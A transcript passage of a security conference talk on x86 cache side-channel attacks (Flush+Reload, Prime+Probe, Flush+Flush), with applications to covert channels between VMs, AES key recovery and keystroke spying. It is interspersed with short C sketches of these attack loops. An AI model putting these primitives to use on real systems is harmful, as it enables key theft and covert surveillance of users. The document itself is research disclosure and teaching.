
What could possibly go wrong with (insert x86 instruction here)? (33c3)

  • 0:00 - 0:13
    Music
  • 0:13 - 0:17
    Herald Angel: We are here with a motto,
    and the motto of this year is "Works For
  • 0:17 - 0:22
    Me" and I think, who many people, how many
    people in here are programmmers? Raise
  • 0:22 - 0:29
    your hands or shout or... Whoa, that's a
    lot. Okay. So I think many of you will
  • 0:29 - 0:39
    work on x86. Yeah. And I think you assume
    that it works, and that everything works
  • 0:39 - 0:48
    as intended. And I mean: What could go
    wrong? Our next talk, the first one today,
  • 0:48 - 0:52
    will be by Clémentine Maurice, who
    previously was here with RowhammerJS,
  • 0:52 - 1:02
    something I would call scary, and Moritz
    Lipp, who has worked on the Armageddon
  • 1:02 - 1:10
    exploit. Okay, so the
    next... I would like to hear a really warm
  • 1:10 - 1:14
    applause for the speakers for the talk
    "What could what could possibly go wrong
  • 1:14 - 1:17
    with insert x86 instruction here?"
  • 1:17 - 1:18
    Thank you.
  • 1:18 - 1:28
    Applause
  • 1:28 - 1:33
    Clémentine Maurice (CM): Well, thank you
    all for being here this morning. Yes, this
  • 1:33 - 1:38
    is our talk "What could possibly go wrong
    with insert x86 instructions here". So
  • 1:38 - 1:43
    just a few words about ourselves: So I'm
    Clémentine Maurice, I got my PhD last year
  • 1:43 - 1:47
    in computer science and I'm now working as
    a postdoc at Graz University of Technology
  • 1:47 - 1:52
    in Austria. You can reach me on Twitter or
    by email, but there's also, I think, a lot
  • 1:52 - 1:57
    of time before the Congress is over.
    Moritz Lipp (ML): Hi and my name is Moritz
  • 1:57 - 2:02
    Lipp, I'm a PhD student at Graz University
    of Technology and you can also reach me on
  • 2:02 - 2:07
    Twitter or just after our talk and in the
    next days.
  • 2:07 - 2:11
    CM: So, about this talk: So, the title
    says this is a talk about x86
  • 2:11 - 2:18
    instructions, but this is not a talk about
    software. Don't leave yet! I'm actually
  • 2:18 - 2:22
    even assuming safe software and the point
    that we want to make is that safe software
  • 2:22 - 2:27
    does not mean safe execution and we have
    information leakage because of the
  • 2:27 - 2:33
    underlying hardware and this is what we're
    going to talk about today. So we'll be
  • 2:33 - 2:37
    talking about cache attacks, what are
    they, what can we do with that and also a
  • 2:37 - 2:42
    special kind of cache attack that we found
    this year. So... doing cache attacks
  • 2:42 - 2:49
    without memory accesses and how to use
    that even to bypass kernel ASLR.
  • 2:49 - 2:53
    So again, the title says this is a talk about
    x86 instructions, but this is even more
  • 2:53 - 2:58
    general than that. We can also mount these
    cache attacks on ARM and not only on the
  • 2:58 - 3:07
    x86. So some of the examples that you will
    see also apply to ARM. So today we'll
  • 3:07 - 3:11
    have a bit of background, but actually
    most of the background will come along the
  • 3:11 - 3:19
    way, because this covers a really huge
    chunk of our research, and we'll see
  • 3:19 - 3:24
    mainly three instructions: So "mov" and
    how we can perform these cache attacks,
  • 3:24 - 3:29
    what are they... The instruction
    "clflush", so here we'll be doing cache
  • 3:29 - 3:36
    attacks without any memory accesses. Then
    we'll see "prefetch" and how we can bypass
  • 3:36 - 3:43
    kernel ASLR and lots of translations
    levels, and then there's even a bonus
  • 3:43 - 3:49
    track, so this will not be our own
    work, but even more instructions and even
  • 3:49 - 3:54
    more attacks.
    Okay, so let's start with a bit of an
  • 3:54 - 4:01
    introduction. So we will be mainly
    focusing on Intel CPUs, and this is
  • 4:01 - 4:06
    roughly in terms of cores and caches, how
    it looks like today. So we have different
  • 4:06 - 4:09
    levels of cores ...uh... different cores
    so here four cores, and different levels
  • 4:09 - 4:14
    of caches. So here usually we have three
    levels of caches. We have level 1 and
  • 4:14 - 4:18
    level 2 that are private to each core,
    which means that core 0 can only access
  • 4:18 - 4:25
    its level 1 and its level 2 and not level
    1 and level 2 of, for example, core 3, and
  • 4:25 - 4:30
    we have the last level cache... so here if
    you can see the pointer... So this one is
  • 4:30 - 4:36
    divided in slices so we have as many
    slices as cores, so here 4 slices, but all
  • 4:36 - 4:41
    the slices are shared across cores, so core
    0 can access the whole last level cache,
  • 4:41 - 4:49
    that's 0 1 2 & 3. We also have a nice
    property on Intel CPUs is that this level
  • 4:49 - 4:52
    of cache is inclusive, and what it means
    is that everything that is contained in
  • 4:52 - 4:57
    level 1 and level 2 will also be contained
    in the last level cache, and this will
  • 4:57 - 5:01
    prove to be quite useful for cache
    attacks.
  • 5:01 - 5:08
    So today we mostly have set associative
    caches. What it means is that we have data
  • 5:08 - 5:13
    that is loaded in specific sets and that
    depends only on its address. So we have
  • 5:13 - 5:19
    some bits of the address that gives us the
    index and that says "Ok the line is going
  • 5:19 - 5:25
    to be loaded in this cache set", so this
    is a cache set. Then we have several ways
  • 5:25 - 5:31
    per set, so here we have 4 ways, and the
    cache line is going to be loaded in a
  • 5:31 - 5:35
    specific way and that will only depend on
    the replacement policy and not on the
  • 5:35 - 5:41
    address itself, so when you load a line
    into the cache, usually the cache is
  • 5:41 - 5:45
    already full and you have to make room for
    a new line. So this is what the
  • 5:45 - 5:50
    replacement policy does: it says, ok, I'm going to
  • 5:50 - 5:58
    remove this line to make room for the next
    line. So for today we're going to see only
  • 5:58 - 6:02
    three instructions, as I've been telling
    you. So the mov instruction: it does a
  • 6:02 - 6:07
    lot of things, but the only aspect that
    we're interested in is that it can
  • 6:07 - 6:13
    access data in the main memory.
    We're going to see clflush: what it does
  • 6:13 - 6:18
    is that it removes a cache line from the
    cache, from the whole cache. And we're
  • 6:18 - 6:26
    going to see prefetch, it prefetches a
    cache line for future use. So we're going
  • 6:26 - 6:31
    to see what they do and the kind of side
    effects that they have and all the attacks
  • 6:31 - 6:35
    that we can do with them. And that's
    basically all the examples you need for
  • 6:35 - 6:40
    today, so even if you're not an expert on
    x86, don't worry, it's not just slides full
  • 6:40 - 6:45
    of assembly and stuff. Okay so on to the
    first one.
  • 6:45 - 6:50
    ML: So we will first start with the 'mov'
    instruction and actually the first slide
  • 6:50 - 6:58
    is full of code. However, as you can see,
    the mov instruction is used to move data
  • 6:58 - 7:03
    from registers to registers, from the main
    memory and back to the main memory and as
  • 7:03 - 7:07
    you can see there are many moves you can
    use but basically it's just to move data
  • 7:07 - 7:13
    and that's all we need to know. In
    addition, a lot of exceptions can occur, so
  • 7:13 - 7:18
    we might assume that those restrictions are
    so tight that nothing can go wrong when
  • 7:18 - 7:22
    you just move data because moving data is
    simple.
  • 7:22 - 7:28
    However, while there are a lot of
    exceptions, the data that is accessed is
  • 7:28 - 7:35
    always loaded into the cache, so data is
    in the cache and this is transparent to
  • 7:35 - 7:41
    the program that is running. However,
    there are side-effects when you run these
  • 7:41 - 7:46
    instructions, and we will see what they
    look like with the mov instruction. So you
  • 7:46 - 7:51
    probably all know that data can either be
    in CPU registers, in the different levels
  • 7:51 - 7:56
    of the cache that Clementine showed to you
    earlier, in the main memory, or on the
  • 7:56 - 8:02
    disk, and depending on where
    the data is located it needs a longer
  • 8:02 - 8:10
    time to be loaded back to the CPU, and
    this is what we can see in this plot. So
  • 8:10 - 8:16
    we try here to measure the access time of
    an address over and over again, assuming
  • 8:16 - 8:22
    that when we access it more often, it is
    already stored in the cache. So most of
  • 8:22 - 8:27
    the time, when we load an address and it
    takes around 70 cycles, we can assume
  • 8:27 - 8:35
    it is served from the cache.
    However, when we assume that the data is
  • 8:35 - 8:40
    loaded from the main memory, we can
    clearly see that it needs a much longer
  • 8:40 - 8:47
    time like a bit more than 200 cycles. So
    depending on when we measure the time it
  • 8:47 - 8:51
    takes to load the address we can say the
    data has been loaded to the cache or the
  • 8:51 - 8:58
    data is still located in the main memory.
    And this property is what we can exploit
  • 8:58 - 9:05
    using cache attacks. So we measure the
    timing differences on memory accesses. And
  • 9:05 - 9:10
    what an attacker does is monitor the
    cache lines, but he has no way to know
  • 9:10 - 9:14
    what's actually the content of the cache
    line. So we can only monitor that this
  • 9:14 - 9:20
    cache line has been accessed and not
    what's actually stored in the cache line.
  • 9:20 - 9:24
    And what you can do with this is you can
    implement covert channels, so you can
  • 9:24 - 9:30
    allow two processes to communicate with
    each other evading the permission system
  • 9:30 - 9:35
    what we will see later on. In addition you
    can also do side channel attacks, so you
  • 9:35 - 9:41
    can spy with a malicious attacking
    application on benign processes, and you
  • 9:41 - 9:46
    can use this to steal cryptographic keys
    or to spy on keystrokes.
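
The timing primitive behind all of these attacks fits in a few lines. A minimal sketch in C, assuming an x86 CPU and GCC/Clang intrinsics (illustrative, not the speakers' code; the ~70 and ~200 cycle values are the ones from the plot and vary per machine):

    #include <stdint.h>
    #include <x86intrin.h>  /* __rdtscp */

    /* Time one access to *p in cycles: a small value (~70 here)
       suggests a cache hit, a large one (~200+) a miss served
       from main memory. */
    static inline uint64_t timed_access(volatile uint8_t *p)
    {
        unsigned int aux;
        uint64_t start = __rdtscp(&aux);  /* timestamp before */
        (void)*p;                         /* the memory access itself */
        return __rdtscp(&aux) - start;    /* timestamp after */
    }
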
  • 9:46 - 9:54
    And basically we have different types of
    cache attacks and I want to explain the
  • 9:54 - 9:59
    most popular one, the "Flush+Reload"
    attack, in the beginning. So on the left,
  • 9:59 - 10:03
    you have the address space of the victim,
    and on the right you have the address
  • 10:03 - 10:09
    space of the attacker who maps a shared
    library—an executable—that the victim is
  • 10:09 - 10:15
    using into its own address space, like
    the red rectangle. And this means that
  • 10:15 - 10:23
    when this data is stored in the cache,
    it's cached for both processes. Now the
  • 10:23 - 10:28
    attacker can use the flush instruction to
    remove the data out of the cache, so it's
  • 10:28 - 10:34
    not in the cache anymore, so it's also not
    cached for the victim. Now the attacker
  • 10:34 - 10:39
    can schedule the victim and if the victim
    decides "yeah, I need this data", it will
  • 10:39 - 10:45
    be loaded back into the cache. And now the
    attacker can reload the data, measure the
  • 10:45 - 10:50
    time how long it took, and then decide
    "okay, the victim has accessed the data in
  • 10:50 - 10:54
    the meantime" or "the victim has not
    accessed the data in the meantime." And by
  • 10:54 - 10:59
    that you can spy if this address has been
    used.
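
One round of the Flush+Reload attack just described might look like this sketch (illustrative; timed_access is the timing routine from the earlier sketch, and threshold is a machine-specific cycle count separating hits from misses):

    #include <stdint.h>
    #include <emmintrin.h>  /* _mm_clflush */

    /* One Flush+Reload round on an address shared with the victim.
       Returns 1 if the victim touched the line since the last flush. */
    static int flush_reload(volatile uint8_t *shared, uint64_t threshold)
    {
        int accessed = timed_access(shared) < threshold; /* reload */
        _mm_clflush((void *)shared);  /* flush again for the next round */
        return accessed;
    }
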
  • 10:59 - 11:03
    The second type of attack is called
    "Prime+Probe" and it does not rely on the
  • 11:03 - 11:09
    shared memory like the "Flush+Reload"
    attack, and it works as follows: Instead
  • 11:09 - 11:16
    of mapping anything into its own address
    space, the attacker loads a lot of data
  • 11:16 - 11:25
    into one cache set, here, and fills the
    cache. Now he again schedules the victim
  • 11:25 - 11:32
    and the victim can access data that maps
    to the same cache set.
  • 11:32 - 11:38
    So the cache set is used by the attacker
    and the victim at the same time. Now the
  • 11:38 - 11:43
    attacker can start measuring the access
    time to the addresses he loaded into the
  • 11:43 - 11:49
    cache before, and when he accesses an
    address that is still in the cache it's
  • 11:49 - 11:56
    faster, so he measures a lower time. And
    if it's not in the cache anymore it has to
  • 11:56 - 12:01
    be reloaded into the cache so it takes a
    longer time. He can sum this up and detect
  • 12:01 - 12:08
    if the victim has loaded data into the
    cache as well. So the first thing we want
  • 12:08 - 12:12
    to show you that you can do with cache
    attacks is that you can implement a covert
  • 12:12 - 12:17
    channel, and this could happen in the
    following scenario.
  • 12:17 - 12:24
    You install an app on your phone to view
    your favorite images you take, to apply
  • 12:24 - 12:29
    some filters, and in the end you don't
    know that it's malicious because the only
  • 12:29 - 12:34
    permission it requires is to access your
    images, which makes sense. So you can
  • 12:34 - 12:39
    easily install it without any fear. In
    addition you want to know what the weather
  • 12:39 - 12:43
    is outside, so you install a nice little
    weather widget, and the only permission it
  • 12:43 - 12:48
    has is to access the internet because it
    has to load the information from
  • 12:48 - 12:56
    somewhere. So what happens if you're able
    to implement a covert channel between
  • 12:56 - 13:00
    these two applications, without any
    permissions or privileges, so they can
  • 13:00 - 13:05
    communicate with each other without using
    any mechanisms provided by the operating
  • 13:05 - 13:11
    system, so it's hidden. It can happen that
    now the gallery app can send the image to
  • 13:11 - 13:19
    the internet, it will be uploaded and
    exposed to everyone. So maybe you don't
  • 13:19 - 13:26
    want to see the cat picture everywhere.
    While we can do this with those
  • 13:26 - 13:30
    Prime+Probe/ Flush+Reload attacks, we will
    discuss a covert channel using
  • 13:30 - 13:36
    Prime+Probe. So how can we transmit this
    data? We need to transmit ones and zeros
  • 13:36 - 13:41
    at some point. So the sender and the
    receiver agree on one cache set that they
  • 13:41 - 13:49
    both use. The receiver probes the set all
    the time. When the sender wants to
  • 13:49 - 13:58
    transmit a zero, he just does nothing, so
    the lines of the receiver are in the cache
  • 13:58 - 14:02
    all the time, and he knows "okay, he's
    sending nothing", so it's a zero.
  • 14:02 - 14:06
    On the other hand if the sender wants to
    transmit a one, he starts accessing
  • 14:06 - 14:11
    addresses that map to the same cache set
    so it will take a longer time for the
  • 14:11 - 14:17
    receiver to access its addresses again,
    and he knows "okay, the sender just sent
  • 14:17 - 14:23
    me a one", and Clementine will show you
    what you can do with this covert channel.
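
The receiver's side of this Prime+Probe covert channel can be sketched as follows (illustrative; eviction_set is assumed to be a pre-computed array of addresses that all map to the agreed cache set, and threshold is again machine-specific):

    #include <stdint.h>

    /* Probe the agreed cache set and decode one bit: if the sender
       accessed the set (a one), our lines were evicted and the summed
       access time is high. Probing also re-primes the set. */
    static int receive_bit(volatile uint8_t **eviction_set, int n,
                           uint64_t threshold)
    {
        uint64_t total = 0;
        for (int i = 0; i < n; i++)
            total += timed_access(eviction_set[i]);
        return total > threshold;  /* slow probe => sender sent a one */
    }
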
  • 14:23 - 14:25
    CM: So the really nice thing about
  • 14:25 - 14:29
    Prime+Probe is that it has really low
    requirements. It doesn't need any kind of
  • 14:29 - 14:34
    shared memory. For example if you have two
    virtual machines you could have some
  • 14:34 - 14:39
    shared memory via memory deduplication.
    The thing is that this is highly insecure,
  • 14:39 - 14:44
    so cloud providers like Amazon EC2, they
    disable that. Now we can still use
  • 14:44 - 14:50
    Prime+Probe because it doesn't need this
    shared memory. Another problem with cache
  • 14:50 - 14:55
    covert channels is that they are quite
    noisy. So when you have other applications
  • 14:55 - 14:59
    that are also running on the system, they
    are all competing for the cache and they
  • 14:59 - 15:03
    might, like, evict some cache lines,
    especially if it's an application that is
  • 15:03 - 15:09
    very memory intensive. And you also have
    noise due to the fact that the sender and
  • 15:09 - 15:13
    the receiver might not be scheduled at the
    same time. So if you have your sender that
  • 15:13 - 15:17
    sends all the things and the receiver is
    not scheduled then some part of the
  • 15:17 - 15:23
    transmission can get lost. So what we did
    is we tried to build an error-free covert
  • 15:23 - 15:31
    channel. We took care of all these noise
    issues by using some error detection to
  • 15:31 - 15:36
    resynchronize the sender and the receiver
    and then we use some error correction to
  • 15:36 - 15:41
    correct the remaining errors.
    So we managed to have a completely error-
  • 15:41 - 15:46
    free covert channel even if you have a lot
    of noise, so let's say another virtual
  • 15:46 - 15:54
    machine also on the machine serving files
    through a web server, also doing lots of
  • 15:54 - 16:02
    memory-intensive tasks at the same time,
    and the covert channel stayed completely
  • 16:02 - 16:08
    error-free, and around 40 to 75 kilobytes
    per second, which is still quite a lot.
  • 16:08 - 16:14
    All of this is between virtual machines on
    Amazon EC2. And the really neat thing—we
  • 16:14 - 16:19
    wanted to do something with that—and
    basically we managed to create an SSH
  • 16:19 - 16:27
    connection really over the cache. So they
    don't have any network between
  • 16:27 - 16:31
    them, but just we are sending the zeros
    and the ones and we have an SSH connection
  • 16:31 - 16:37
    between them. So you could say that cache
    covert channels are nothing serious, but I think
  • 16:37 - 16:43
    it's a real threat. And if you want to
    have more details about this work in
  • 16:43 - 16:49
    particular, it will be published soon at
    NDSS.
  • 16:49 - 16:54
    So the second application that we wanted
    to show you is that we can attack crypto
  • 16:54 - 17:01
    with cache attacks. In particular we are
    going to show an attack on AES and a
  • 17:01 - 17:05
    special implementation of AES that uses
    T-tables, so that's the fast software
  • 17:05 - 17:12
    implementation because it uses some
    precomputed lookup tables. It's known to
  • 17:12 - 17:17
    be vulnerable to side-channel attacks
    since 2006 by Osvik et al, and it's a one-
  • 17:17 - 17:24
    round known plaintext attack, so you have
    p—or plaintext—and k, your secret key. And
  • 17:24 - 17:30
    the AES algorithm, what it does is compute
    an intermediate state at each round r.
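
As the speakers explain next, the first-round table index is just p XOR k, and a 64-byte cache line covers 16 four-byte T-table entries, so each observed hot line reveals the upper four bits of one key byte. A sketch, assuming the classic layout of 256-entry T-tables with 4-byte words:

    #include <stdint.h>

    /* Round one accesses T[p ^ k]; the observed line index is
       (p ^ k) >> 4, so p ^ (line << 4) recovers the key byte's upper
       nibble. The lower four bits stay unknown at line granularity. */
    static uint8_t key_upper_nibble(uint8_t p, uint8_t hot_line)
    {
        return (uint8_t)((p ^ (hot_line << 4)) & 0xF0);
    }
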
  • 17:30 - 17:39
    And in the first round, the accessed table
    indices are just p XOR k. Now it's a known
  • 17:39 - 17:44
    plaintext attack, what this means is that
    if you can recover the accessed table
  • 17:44 - 17:49
    indices you've also managed to recover the
    key because it's just XOR. So that would
  • 17:49 - 17:55
    be bad, right, if we could recover these
    accessed table indices. Well we can, with
  • 17:55 - 18:01
    cache attacks! So we did that with
    Flush+Reload and with Prime+Probe. On the
  • 18:01 - 18:06
    x-axis you have the plaintext byte values
    and on the y-axis you have the addresses
  • 18:06 - 18:16
    which are essentially the T table entries.
    So a black cell means that we've monitored
  • 18:16 - 18:20
    the cache line, and we've seen a lot of
    cache hits. So basically the blacker it
  • 18:20 - 18:26
    is, the more certain we are that the
    T-Table entry has been accessed. And here
  • 18:26 - 18:32
    it's a toy example, the key is all-zeros,
    but you would basically just have a
  • 18:32 - 18:36
    different pattern if the key was not all-
    zeros, and as long as you can see this
  • 18:36 - 18:43
    nice diagonal or a pattern then you have
    recovered the key. So it's an old attack,
  • 18:43 - 18:49
    2006, it's been 10 years, everything
    should be fixed by now, and you see where
  • 18:49 - 18:57
    I'm going: it's not. So on Android the
    Bouncy Castle implementation uses by
  • 18:57 - 19:03
    default the T-table, so that's bad. Also
    many implementations that you can find
  • 19:03 - 19:11
    online use pre-computed values, so maybe
    be wary about this kind of attacks. The
  • 19:11 - 19:17
    last application we wanted to show you is
    how we can spy on keystrokes.
  • 19:17 - 19:21
    So for that we will use Flush+Reload
    because it's a really fine grained
  • 19:21 - 19:26
    attack. We can see very precisely which
    cache line has been accessed, and a cache
  • 19:26 - 19:31
    line is only 64 bytes so it's really not a
    lot and we're going to use that to spy on
  • 19:31 - 19:38
    keystrokes and we even have a small demo
    for you.
  • 19:40 - 19:46
    ML: So what you can see on the screen, this
    is not on Intel x86, it's on a smartphone,
  • 19:46 - 19:50
    on the Galaxy S6, but you can also apply
    these cache attacks there so that's what
  • 19:50 - 19:54
    we want to emphasize.
    So on the left you see the screen and on
  • 19:54 - 19:58
    the right we have connected a shell with
    no privileges and permissions, so it can
  • 19:58 - 20:01
    basically be an app that you install
    glass bottle falling
  • 20:01 - 20:09
    from the App Store and on the right we are
    going to start our spy tool, and on the
  • 20:09 - 20:14
    left we just open the messenger app and
    whenever the user hits any key on the
  • 20:14 - 20:20
    keyboard, our spy tool takes care of that
    and notices it. Also if he presses the
  • 20:20 - 20:26
    spacebar we can also measure that. If the
    user decides "ok, I want to delete the
  • 20:26 - 20:31
    word" because he changed his mind, we can
    also register if the user pressed the
  • 20:31 - 20:38
    backspace button, so in the end we can see
    exactly how long the words were that the user
  • 20:38 - 20:46
    typed into his phone, without any
    permissions or privileges, which is bad.
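
Stripped of details, the spy tool in this demo is a Flush+Reload loop on one code address in the shared keyboard library; a sketch (illustrative; key_handler_addr is a stand-in for the address of the function that runs on each keypress, which the real attack must first locate, and flush_reload is the routine from the earlier sketch):

    #include <stdint.h>
    #include <stdio.h>
    #include <unistd.h>  /* usleep */

    /* Poll one shared code address and report an event whenever the
       victim executed it, i.e. whenever a key was pressed. */
    static void spy_on_keystrokes(volatile uint8_t *key_handler_addr,
                                  uint64_t threshold)
    {
        for (;;) {
            if (flush_reload(key_handler_addr, threshold))
                printf("key event\n");
            usleep(100);  /* poll much faster than typing speed */
        }
    }
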
  • 20:46 - 20:55
    laughs
    applause
  • 20:55 - 21:00
    ML: So enough about the mov instruction,
    let's head to clflush.
  • 21:00 - 21:07
    CM: So the clflush instruction: What it
    does is that it invalidates from every
  • 21:07 - 21:12
    level the cache line that contains the
    address that you pass to this instruction.
  • 21:12 - 21:17
    So in itself it's kind of bad because it
    enables the Flush+Reload attacks that we
  • 21:17 - 21:21
    showed earlier, that was just flush,
    reload, and the flush part is done with
  • 21:21 - 21:29
    clflush. But there's actually more to it,
    how wonderful. So there's a first timing
  • 21:29 - 21:33
    leakage with it, so we're going to see
    that the clflush instruction has a
  • 21:33 - 21:38
    different timing depending on whether the
    data that you pass to it is
  • 21:38 - 21:45
    cached or not. So imagine you have a cache
    line that is in the level 1.
  • 21:45 - 21:50
    With the inclusion property it has to be
    also in the last level cache. Now this is
  • 21:50 - 21:54
    quite convenient and this is also why we
    have this inclusion property for
  • 21:54 - 22:00
    performance reasons on Intel CPUs: if you
    want to see if a line is present at all in
  • 22:00 - 22:04
    the cache you just have to look in the
    last level cache. So this is basically
  • 22:04 - 22:08
    what the clflush instruction does. It goes
    to the last last level cache, sees "ok
  • 22:08 - 22:13
    there's a line, I'm going to flush this
    one" and then there's something that tells
  • 22:13 - 22:19
    ok the line is also present somewhere else
    so then it flushes the line in level 1
  • 22:19 - 22:26
    and/or level 2. So that's slow. Now if you
    perform clflush on some data that is not
  • 22:26 - 22:32
    cached, basically it does the same, goes
    to the last level cache, sees that there's
  • 22:32 - 22:37
    no line and there can't be any... This
    data can't be anywhere else in the cache
  • 22:37 - 22:41
    because it would be in the last level
    cache if it was anywhere, so it does
  • 22:41 - 22:47
    nothing and it stops there. So that's fast.
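
The difference described here is easy to measure: time the clflush instruction itself. A sketch (illustrative; the few-cycle gap this exposes is the primitive the rest of this section builds on):

    #include <stdint.h>
    #include <x86intrin.h>  /* __rdtscp, _mm_clflush */

    /* Time one clflush in cycles: slower if the line was cached
       (it must also be invalidated in L1/L2), faster if it was not. */
    static inline uint64_t timed_clflush(void *p)
    {
        unsigned int aux;
        uint64_t start = __rdtscp(&aux);
        _mm_clflush(p);
        return __rdtscp(&aux) - start;
    }
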
    So how exactly fast and slow am I talking
  • 22:47 - 22:54
    about? So it's actually only a very few
    cycles, so we did these experiments on
  • 22:54 - 22:59
    different microarchitectures, so Sandy
    Bridge, Ivy Bridge, and Haswell, and...
  • 22:59 - 23:03
    So the different colors correspond to the
    different microarchitectures. So first
  • 23:03 - 23:08
    thing that is already... kinda funny is
    that you can see that you can distinguish
  • 23:08 - 23:15
    the microarchitectures quite nicely with
    this, but the real point is that you have
  • 23:15 - 23:20
    really different zones.
    The solid line is when we performed the
  • 23:20 - 23:25
    measurement on clflush with the line that
    was already in the cache, and the dashed
  • 23:25 - 23:31
    line is when the line was not in the
    cache, and in all microarchitectures you
  • 23:31 - 23:37
    can see that there is a difference: It's
    only a few cycles, it's a bit noisy, so
  • 23:37 - 23:43
    what could go wrong? Okay, so exploiting
    these few cycles, we still managed to
  • 23:43 - 23:47
    perform a new cache attacks that we call
    "Flush+Flush", so I'm going to explain
  • 23:47 - 23:52
    that to you: So basically everything that
    we could do with "Flush+Reload", we can
  • 23:52 - 23:57
    also do with "Flush+Flush". We can perform
    cover channels and sidechannel attacks.
  • 23:57 - 24:01
    It's stealthier than previous cache
    attacks, I'm going to go back on this one,
  • 24:01 - 24:07
    and it's also faster than previous cache
    attacks. So how does it work exactly? So
  • 24:07 - 24:12
    the principle is a bit similar to
    "Flush+Reload": So we have the attacker
  • 24:12 - 24:16
    and the victim that have some kind of
    shared memory, let's say a shared library.
  • 24:16 - 24:21
    It will be shared in the cache. The
    attacker will start by flushing the cache
  • 24:21 - 24:27
    line, then lets the victim perform
    whatever it does, let's say encryption,
  • 24:27 - 24:32
    the victim will load some data into the
    cache, automatically, and now the attacker
  • 24:32 - 24:37
    wants to know again if the victim accessed
    this precise cache line and instead of
  • 24:37 - 24:44
    reloading it, he is going to flush it again.
    And since we have this timing difference
  • 24:44 - 24:47
    depending on whether the data is in the
    cache or not, it gives us the same
  • 24:47 - 24:55
    information as if we reloaded it, except
    it's way faster. So I talked about
  • 24:55 - 25:00
    stealthiness. So the thing is that
    basically these cache attacks and that
  • 25:00 - 25:06
    also applies to "Rowhammer": They are
    already stealthy in themselves, because
  • 25:06 - 25:10
    there's no antivirus today that can detect
    them. But some people thought that we
  • 25:10 - 25:14
    could detect them with performance
    counters because they do a lot of cache
  • 25:14 - 25:19
    misses and cache references that happen
    when the data is flushed and when you
  • 25:19 - 25:26
    reaccess memory. Now what we thought is
    that yeah but that also not the only
  • 25:26 - 25:31
    program steps to lots of cache misses and
    cache references so we would like to have
  • 25:31 - 25:38
    a slightly better metric. So these cache
    attacks they have a very heavy activity on
  • 25:38 - 25:44
    the cache but they're also very particular
    because there are very short loops of code
  • 25:44 - 25:49
    if you take Flush+Reload, this just
    flushes one line, reloads the line, and then
  • 25:49 - 25:54
    again flush, reload; that's a very short loop
    and that creates a very low pressure on
  • 25:54 - 26:01
    the instruction TLB, which is kind of
    particular for cache attacks. So what we
  • 26:01 - 26:05
    decided to do is normalize the cache
    events, so the cache misses and cache
  • 26:05 - 26:11
    references by events that have to do with
    the instruction TLB and there we could
  • 26:11 - 26:19
    manage to detect cache attacks and
    Rowhammer without having false positives,
  • 26:19 - 26:25
    so this is the metric that I'm going to use
    when I talk about stealthiness. So we
  • 26:25 - 26:30
    started by creating a covert channel. First
    we wanted to have it as fast as possible
  • 26:30 - 26:36
    so we created a protocol to evaluate all
    the kinds of cache attacks that we had, so
  • 26:36 - 26:41
    Flush+Flush, Flush+Reload, and
    Prime+Probe, and we started with a
  • 26:41 - 26:47
    packet size of 28, doesn't really matter.
    We measured the capacity of our covert
  • 26:47 - 26:53
    channel, and Flush+Flush is around
    500 kB/s whereas Flush+Reload
  • 26:53 - 26:56
    was only 300 kB/s
    so Flush+Flush is already quite an
  • 26:56 - 27:01
    improvement on the speed.
    Then we measured the stealthiness: at this
  • 27:01 - 27:06
    speed, only Flush+Flush was stealthy. And
    now the thing is that Flush+Flush and
  • 27:06 - 27:10
    Flush+Reload, as you've seen, have
    some similarities, so for a covert channel
  • 27:10 - 27:15
    they also share the same sender, only the
    receiver is different, and for this one the
  • 27:15 - 27:20
    sender was not stealthy for either of them.
    Anyway, if you want a fast covert channel,
  • 27:20 - 27:27
    then just try Flush+Flush, that works.
    Now let's try to make it stealthy
  • 27:27 - 27:31
    completely stealthy, because if I have a
    sender that is not stealthy, maybe we
  • 27:31 - 27:36
    give away the whole attack. So we said okay,
    maybe if we just slow down all the attacks
  • 27:36 - 27:41
    then there will be fewer cache hits and
    cache misses and then maybe all
  • 27:41 - 27:48
    the attacks are actually stealthy why not?
    So we tried that we slowed down everything
  • 27:48 - 27:53
    so Flush+Reload and Flush+Flush
    are around 50 kB/s now
  • 27:53 - 27:56
    Prime+Probe is a bit slower because it
    takes more time
  • 27:56 - 28:01
    to prime and probe anything but still
  • 28:01 - 28:09
    even with this slow down only Flush+Flush
    has its receiver stealthy, and we also
  • 28:09 - 28:15
    managed to have the sender stealthy now. So
    basically whether you want a fast covert
  • 28:15 - 28:20
    channel or a stealthy covert channel,
    Flush+Flush is really great.
  • 28:20 - 28:26
    Now we wanted to also evaluate if it
    wasn't too noisy to perform some side
  • 28:26 - 28:31
    channel attack so we did these side
    channels on the AES t-table implementation
  • 28:31 - 28:36
    the attacks that we have shown you
    earlier, so we computed the number of
  • 28:36 - 28:42
    encryptions that we needed to determine the
    upper four bits of a key byte. So here, the
  • 28:42 - 28:49
    lower the better the attack, and Flush+
    Reload is a bit better, so we need only 250
  • 28:49 - 28:55
    encryptions to recover these bits, but
    Flush+Flush comes quite
  • 28:55 - 29:01
    close with 350, and Prime+Probe is
    actually the most noisy of them all, needs
  • 29:01 - 29:06
    5... close to 5000 encryptions. So we have
    around the same performance for
  • 29:06 - 29:14
    Flush+Flush and Flush+Reload.
    Now let's evaluate the stealthiness again.
  • 29:14 - 29:19
    So what we did here is we performed 256
    billion encryptions in a synchronous
  • 29:19 - 29:26
    attack, so we really had the spy and the
    victim scheduled, and we evaluated the
  • 29:26 - 29:31
    stealthiness of them all and here only
    Flush+Flush again is stealthy. And while
  • 29:31 - 29:36
    you can always slow down a covert channel
    you can't actually slow down a side
  • 29:36 - 29:41
    channel because, in a real-life scenario,
    you're not going to say "Hey victim, him
  • 29:41 - 29:47
    wait for me a bit, I am trying to do an
    attack here." That won't work.
  • 29:47 - 29:51
    So there's even more to it but I will need
    again a bit of background before
  • 29:51 - 29:57
    continuing. So I've shown you the
    different levels of caches and here I'm
  • 29:57 - 30:04
    going to focus more on the last-level
    cache. So we have here our four slices so
  • 30:04 - 30:10
    this is the last-level cache and we have
    some bits of the address here that
  • 30:10 - 30:14
    correspond to the set, but more
    importantly, we need to know in
  • 30:14 - 30:20
    which slice an address is going to be.
    And that is given by some
  • 30:20 - 30:24
    bits of the set and the tag of the
    address that are passed into a function
  • 30:24 - 30:28
    that says in which slice the line is going
    to be.
  • 30:28 - 30:32
    Now the thing is that this hash function
    is undocumented by Intel. Wouldn't be fun
  • 30:32 - 30:39
    otherwise. So we have this: as many slices
    as cores, an undocumented hash function
  • 30:39 - 30:44
    that maps a physical address to a slice,
    and while it's actually a bit of a pain
  • 30:44 - 30:49
    for attacks, it was not designed
    for security originally but for
  • 30:49 - 30:54
    performance, because you want all the
    access to be evenly distributed in the
  • 30:54 - 31:00
    different slices, for performance reasons.
    So what the hash function basically does is
    take some bits of the physical address
    takes some bits of the physical address
    and output k bits of slice index, so just one
